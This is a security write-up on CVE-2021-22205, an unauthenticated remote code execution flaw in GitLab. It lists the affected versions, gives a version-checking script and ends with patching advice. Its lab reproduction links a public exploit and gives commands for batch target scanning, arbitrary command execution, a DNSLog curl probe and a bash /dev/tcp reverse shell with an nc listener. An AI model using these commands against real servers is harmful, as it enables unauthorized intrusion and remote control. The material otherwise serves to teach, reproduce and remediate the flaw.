CVE-2021-22205 GitLab unauthorized RCE
Vulnerability background and description
On April 15, 2021, GitLab officially released a security patch for a command execution vulnerability in GitLab (CVE-2021-22205). Because the ExifTool used by GitLab does not correctly handle the file extension of an uploaded image, an attacker can execute arbitrary commands on the target server by uploading a specially crafted malicious image. It was later found that the vulnerable code is reachable through an unauthenticated endpoint in GitLab, so the vulnerability can be exploited without authentication. Both Community Edition (CE) and Enterprise Edition (EE) are affected, with a CVSS score of 9.9.
Versions affected by the vulnerability
- 11.9 <= Gitlab CE/EE < 13.8.8
- 13.9 <= Gitlab CE/EE < 13.9.6
- 13.10 <= Gitlab CE/EE < 13.10.3
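As an added defensive check (example code, not from the original post or the exploit repository), the following Python function decides whether a GitLab version string falls inside the three affected ranges listed above, so the list can be applied to an inventory of instances; the sample version strings are constructed:

```python
"""Check whether a GitLab version string falls inside the CVE-2021-22205
affected ranges listed above. Added example, not part of the original post."""
import re

# Affected ranges exactly as stated on the page: lower bound inclusive,
# upper bound (the fixed release) exclusive.
AFFECTED_RANGES = (
    ((11, 9, 0), (13, 8, 8)),
    ((13, 9, 0), (13, 9, 6)),
    ((13, 10, 0), (13, 10, 3)),
)


def parse_version(version: str) -> tuple:
    """Turn '13.10.2-ee' / '13.9' / 'v13.8.8' into a 3-tuple of ints.

    Edition suffixes (-ee, -ce) and a leading 'v' are ignored; missing
    minor/patch components are treated as 0.
    """
    m = re.match(r"^v?(\d+)(?:\.(\d+))?(?:\.(\d+))?", version.strip())
    if not m:
        raise ValueError(f"unrecognised GitLab version: {version!r}")
    major, minor, patch = (int(g) if g is not None else 0 for g in m.groups())
    return (major, minor, patch)


def is_affected(version: str) -> bool:
    """Return True if the version lies in any affected range."""
    v = parse_version(version)
    return any(lo <= v < hi for lo, hi in AFFECTED_RANGES)


def triage(versions):
    """Map each version string to its status for a quick inventory report."""
    return {v: ("AFFECTED" if is_affected(v) else "not affected") for v in versions}


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample = ["13.10.2-ee", "13.8.8", "13.9.5", "11.8.0", "13.11.0"]
    for ver, status in triage(sample).items():
        print(f"{ver:12} {status}")
```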
Vulnerability reproduction
This reproduction uses the Vulhub lab environment, so a Vulhub lab needs to be set up locally first.
Enter the lab environment directory and start the environment with the following command:
docker-compose up -d
Check whether the environment's port is open:
docker-compose ps
Access the target URL: http://192.168.0.109:8080
Download the exploit script: https://github.com/Al1ex/CVE-2021-22205
Vulnerability detection
python3 CVE-2021-22205.py -v true -t http://192.168.0.109:8080/
Batch detection
python3 CVE-2021-22205.py -s true -f target.txt
Exploit
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c command
DNSLog probe
Website address: http://www.dnslog.cn/
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "curl p77j19.dnslog.cn"
Reverse shell
If the target has outbound network access, you can try a reverse shell.
Start a listener on the local machine:
nc -lvp 4444
# First write the reverse shell command into the file 1.sh in the /tmp directory
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "echo 'bash -i >& /dev/tcp/192.168.0.109/4444 0>&1' > /tmp/1.sh"
# Execute that file
python3 CVE-2021-22205.py -a true -t http://192.168.0.109:8080/ -c "bash /tmp/1.sh"
The local machine receives the session on the listener.
Vulnerability Prevention and Remediation
Official upgrade
GitLab has released fixed versions for this vulnerability. Affected users should upgrade to the latest version as soon as possible. Official download link: https://about.gitlab.com/update/
Temporary protective measures
If users cannot upgrade immediately, access to the web port can be restricted with an IP whitelist.
Reference: https://about.gitlab.com/releases/2021/04/14/security-release-gitlab-13-10-3-released/